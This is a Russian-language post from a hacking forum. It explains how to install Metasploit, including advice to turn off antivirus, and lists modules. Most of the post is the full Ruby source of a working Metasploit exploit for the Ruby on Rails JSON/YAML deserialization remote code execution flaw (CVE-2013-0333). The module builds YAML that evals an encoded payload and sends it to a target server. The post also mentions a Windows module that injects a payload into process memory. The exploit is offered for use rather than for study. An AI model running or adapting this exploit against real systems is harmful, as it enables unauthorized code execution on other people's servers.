Модули для Metasploit Framework | Форум хакерской тематики - Программы, исходники программ.

Модули для Metasploit Framework

Hidden bot

ГЕНЕРАЛ
Сообщения
1,131
Реакции
95,154
Баллы
874,666
8035bfc356f84a20ab383b3bf10a86d8.png

Ставим metasploit..
Тут всё как бы просто)) на данный момент мне известно 2 варианта установки))) мы с Вами, уважаемые читатели, рассмотрим оба)))

1) Скачать дистрибудив у официального производителя/поставщика
2) GitHub + все его плюшки.....

Вариант 1.

Собственно фарш METASPLOIT'а, установочный пакет для бесплатной загрузки.
Скрытое содержимое доступно для зарегистрированных пользователей!


  1. Если у Вас Windows***, то отключив антивирус, двойным щелчком запускаем установщик и следуем его инструкциям
  2. Linux..., запускаем консоль, пишем:
Скрытое содержимое доступно для зарегистрированных пользователей!
Далее следуем инструкциям установщика..., далее, далее, далее...., готова.
Снова открываем консоль, пишем msfconsole и вооля....
ЗЫ..: Отличия этого метода в том, что содержимое не обновляется....(( То есть актуальность на момент установки...(((\

Вариант 2.
(доступен только для пользователей Linux платформ)

Открываем консоль и пишем следующее...:

Скрытое содержимое доступно для зарегистрированных пользователей!
Ждём окончания процесса..., минут 15-20. За это время скрипт автоматически выкачает и установит весь необходимый набор пакетов и зависимостей, необходимых для корректной работы. Установит PostgreSQL создаст базу, пользователя, пропишет в msf.., ну ясно в общем.. и ГЛАВНОЕ, при запуске скрипта из комплекта Метасплоита, "msfupdate", он проверит актуальность установленной базы модулей с базой GitHub(url), и произведёт загрузку и обновления недостающего.

**************************************************************************
Дальше публикуем модули, дополнения, сплоиты, классы, и всё что к этому прилагается.
**************************************************************************

Windows Manage Memory Payload Injection

Этот модуль Metasploit будет вводить полезную нагрузку в память процесса. Если полезная нагрузка не выбран, то по умолчанию для обратного TCP meterpreter х86. Если параметр PID datastore не указан, то он будет внедрен в notepad.exe вместо этого.

Скрытое содержимое доступно для зарегистрированных пользователей!


Ruby on Rails JSON Processor YAML Deserialization Code Execution - Ruby on Rails JSON процессор YAML десериализация выполнение кода

Код:
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::CmdStagerTFTP
    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Ruby on Rails JSON Processor YAML Deserialization Code Execution',
            'Description'    => %q{
                    This module exploits a remote code execution vulnerability in the
                JSON request processor of the Ruby on Rails application framework.
                This vulnerability allows an attacker to instantiate a remote object,
                which in turn can be used to execute any ruby code remotely in the
                context of the application. This vulnerability is very similar to
                CVE-2013-0156.

                This module has been tested successfully on RoR 3.0.9, 3.0.19, and
                2.3.15.

                The technique used by this module requires the target to be running a
                fairly recent version of Ruby 1.9 (since 2011 or so). Applications
                using Ruby 1.8 may still be exploitable using the init_with() method,
                but this has not been demonstrated.

            },
            'Author'         =>
                [
                    'jjarmoc',  # Initial module based on cve-2013-0156, testing help
                    'egypt',    # Module
                    'lian',     # Identified the RouteSet::NamedRouteCollection vector
                ],
            'License'        => MSF_LICENSE,
            'References'  =>
                [
                    ['CVE', '2013-0333'],
                ],
            'Platform'       => 'ruby',
            'Arch'           => ARCH_RUBY,
            'Privileged'     => false,
            'Targets'        =>  [ ['Automatic', {} ] ],
            'DisclosureDate' => 'Jan 28 2013',
            'DefaultOptions' => { "PrependFork" => true },
            'DefaultTarget' => 0))

        register_options(
            [
                Opt::RPORT(80),
                OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
                OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"])

            ], self.class)

    end

    #
    # Create the YAML document that will be embedded into the JSON
    #
    def build_yaml_rails2

        code = Rex::Text.encode_base64(payload.encoded)
        yaml =
            "--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
            "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
            "eval(%[#{code}].unpack(%[m0])[0]);' " +
            ": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n   " +
            ":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n     :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " +
            ":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n"
        yaml.gsub(':', '\u003a')
    end


    #
    # Create the YAML document that will be embedded into the JSON
    #
    def build_yaml_rails3

        code = Rex::Text.encode_base64(payload.encoded)
        yaml =
            "--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
            "'#{Rex::Text.rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " +
            ": !ruby/object:OpenStruct\n table:\n  :defaults: {}\n"
        yaml.gsub(':', '\u003a')
    end

    def build_request(v)
        case v
        when 2; build_yaml_rails2
        when 3; build_yaml_rails3
        end
    end

    #
    # Send the actual request
    #
    def exploit

        [2, 3].each do |ver|
            print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...")
            send_request_cgi({
                'uri'     => normalize_uri(target_uri.path),
                'method'  => datastore['HTTP_METHOD'],
                'ctype'   => 'application/json',
                'headers' => { 'X-HTTP-Method-Override' => 'get' },
                'data'    => build_request(ver)
            }, 25)
            handler
        end

    end
end

Остальные можете кидать в раздел скрипты для кали линукс или для термук. Это как пример.
 
Сверху